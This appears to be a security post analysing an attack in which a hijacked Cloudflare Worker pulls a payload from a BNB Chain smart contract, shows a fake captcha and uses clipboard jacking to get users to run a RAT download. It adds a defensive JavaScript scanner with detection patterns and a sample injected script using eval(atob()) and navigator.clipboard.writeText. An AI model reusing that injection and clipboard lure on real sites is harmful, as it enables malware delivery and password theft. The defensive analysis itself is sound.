Here are the technical details for your convenience:

An attacker found a way to enter the Cloudflare management interface (the one used to protect websites) and, by defining a new Worker there, injects sophisticated JavaScript code that is very difficult to detect.

This method is interesting because the code itself is stored on a platform called BNB Chain.

Why is BNB Chain used in the attack ❓

The script uses the Ethereum-compatible JSON-RPC API to make an “eth_call” request to a specific smart contract address (0x886d310Ac23e05EA705e24E513D19f53793832A9).

– The smart contract stores or encodes additional malicious data, which is dynamically retrieved when the code is run.

– The script decodes the payload and runs it in real time with eval(atob(…)), which means the malicious code is hidden within the blockchain itself 😈

– Using BNB Chain allows attackers to store malicious code on the blockchain instead of on a traditional server, making it difficult to detect and remove.

What happens next ❓

1. The code is loaded on every server (or domain) registered with Cloudflare

2. The code is added right after the Cloudflare <script>

3. A fake captcha is created that waits for a user to click (watering hole)

4. The user validates the captcha and a window immediately pops up asking the user to press the 🪟 key on the keyboard together with the “R” key, which opens a command window. The second request is to paste (press CTRL + V) into that command window and press ENTER.

5. The reason for the CTRL + V instruction is that the attacker is exploiting a technique called clipboard jacking. For example, calling navigator.clipboard.writeText after the click on the fake captcha “feeds” the clipboard without the user ever pressing CTRL + C.

6. The pasted clipboard content contacts the attack server and downloads RAT malware, which apparently aims to keep stealing more and more passwords.
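As an added example (not part of the original post), here is a small defender-side scanner that flags the indicators the post describes when run over a captured Worker script or page HTML: a JSON-RPC “eth_call”, the contract address quoted above, eval(atob(…)) decoding, a clipboard write, and the Win + R / CTRL + V prompt text. The weights, thresholds, and the constructed sample inputs are my own assumptions, not anything from the post.

```javascript
// Added example: static indicator scan for the Worker-injection / fake-captcha
// pattern described in the post. Weights and thresholds are assumptions.
const INDICATORS = [
  // JSON-RPC call used to pull the payload from the chain
  { id: "eth_call_rpc", re: /\bmethod\b["']?\s*:\s*["']eth_call["']/i, weight: 3 },
  // contract address quoted in the post
  { id: "known_contract", re: /0x886d310Ac23e05EA705e24E513D19f53793832A9/i, weight: 5 },
  // runtime decode-and-execute of a base64 payload
  { id: "eval_atob", re: /\beval\s*\(\s*atob\s*\(/i, weight: 4 },
  // clipboard jacking primitive
  { id: "clipboard_write", re: /navigator\.clipboard\.writeText\s*\(/i, weight: 2 },
  // social-engineering prompt text (Win + R, CTRL + V)
  { id: "run_prompt_text", re: /(win(dows)?\s*\+\s*r|ctrl\s*\+\s*v)/i, weight: 2 },
];

// Returns which indicators matched, a weighted score, and a verdict.
function scanScript(source) {
  const matched = INDICATORS.filter((i) => i.re.test(source));
  const hits = matched.map((i) => i.id);
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  const verdict = score >= 6 ? "block" : score >= 3 ? "review" : "clean";
  return { hits, score, verdict };
}

// Constructed sample resembling the injected Worker output described above.
const SUSPICIOUS_SAMPLE = `
fetch(RPC_URL, { method: "POST", body: JSON.stringify({ jsonrpc: "2.0",
  method: "eth_call",
  params: [{ to: "0x886d310Ac23e05EA705e24E513D19f53793832A9", data: DATA }, "latest"], id: 1 }) })
  .then((r) => r.json())
  .then((j) => eval(atob(j.result)));
captcha.onclick = () => {
  navigator.clipboard.writeText(cmd);
  alert("Press Win + R, then CTRL + V and ENTER to verify you are human");
};
`;

// Constructed benign sample: an ordinary page script with no indicators.
const BENIGN_SAMPLE = `
document.querySelector("#consent").addEventListener("click", () => {
  fetch("/api/consent", { method: "POST" });
});
`;

// Stand-alone usage
console.log(scanScript(SUSPICIOUS_SAMPLE)); // verdict "block"
console.log(scanScript(BENIGN_SAMPLE));     // verdict "clean"
```

In practice you would feed this the rendered HTML of your own sites (fetched from outside your network, so you see what Cloudflare actually serves) and the source of every Worker listed in the dashboard, and treat any “block” verdict as a sign the account itself needs to be reviewed, not just the script.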

What will attackers do with all these approaches ⁉️

One possible direction is selling access on dark web forums. This is a very profitable method that lets attackers make easy money. Since there is no visible attack and no ransom or specific demand from the attacker, we can assume this is an attempt to sell the foothold to a third party (a ransomware group or another interested party) if the foothold is in a significant organization or spans a large number of websites.

Need help?

Talk to us in the comments if you have any more questions.